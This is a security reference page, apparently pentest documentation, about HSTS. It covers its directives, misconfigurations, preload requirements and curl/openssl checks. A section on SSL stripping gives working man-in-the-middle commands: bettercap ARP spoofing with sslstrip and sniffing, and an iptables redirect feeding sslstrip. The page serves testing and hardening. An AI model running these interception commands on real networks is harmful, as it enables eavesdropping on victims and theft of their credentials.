Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

HSTS forces browsers to use HTTPS only. Without it, attacker can intercept HTTP requests and perform SSL stripping (downgrade HTTPS → HTTP).

Check HSTS

curl -s -I https://TARGET | grep -i "strict-transport-security"

Expected Header

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Directives

DirectiveDescription
max-ageSeconds browser remembers HTTPS-only. OWASP recommends 63072000 (2 years). Minimum 31536000 (1 year) for preload
includeSubDomainsApply to all subdomains. Required for preload submission
preloadEligible for browser preload list. Has permanent consequences — hard to undo

Misconfigurations

Missing HSTS

No header → SSL stripping possible on first visit.

Low max-age

Strict-Transport-Security: max-age=0
Strict-Transport-Security: max-age=300
max-age=0 disables HSTS. Low values = short protection window.

Missing includeSubDomains

Strict-Transport-Security: max-age=31536000
Subdomains still accessible via HTTP → MITM on subdomain.

HSTS on HTTP Response

HSTS header on HTTP (not HTTPS) response is ignored by browsers. Must be served over HTTPS.

Missing preload

Without preload, first visit to site is still vulnerable (TOFU — Trust On First Use).

SSL Stripping Attack

When HSTS is missing or expired:

bettercap

» set http.proxy.sslstrip true
» set net.sniff.verbose true
» http.proxy on
» arp.spoof on
» net.sniff on

sslstrip (Legacy)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
Intercepts HTTP → HTTPS redirects. Victim stays on HTTP, attacker proxies to HTTPS.

HSTS Preload

Browser ships with hardcoded list of HSTS domains. Protects even first visit. 
https://hstspreload.org/
Requirements:
  • Valid HTTPS on root domain
  • Redirect HTTP → HTTPS
  • HSTS header with max-age >= 31536000, includeSubDomains, preload
  • All subdomains serve HTTPS

Testing

Check Preload Status

https://hstspreload.org/?domain=TARGET

Check HTTP → HTTPS Redirect

curl -s -I http://TARGET | grep -i "location"

Check Certificate

openssl s_client -connect TARGET:443 -servername TARGET </dev/null 2>/dev/null | openssl x509 -noout -dates

Quick Reference

IssueRisk
No HSTSSSL stripping on any visit
Low max-ageShort protection window
No includeSubDomainsSubdomain MITM
No preloadFirst visit vulnerable (TOFU)
HSTS over HTTPIgnored by browser

Sources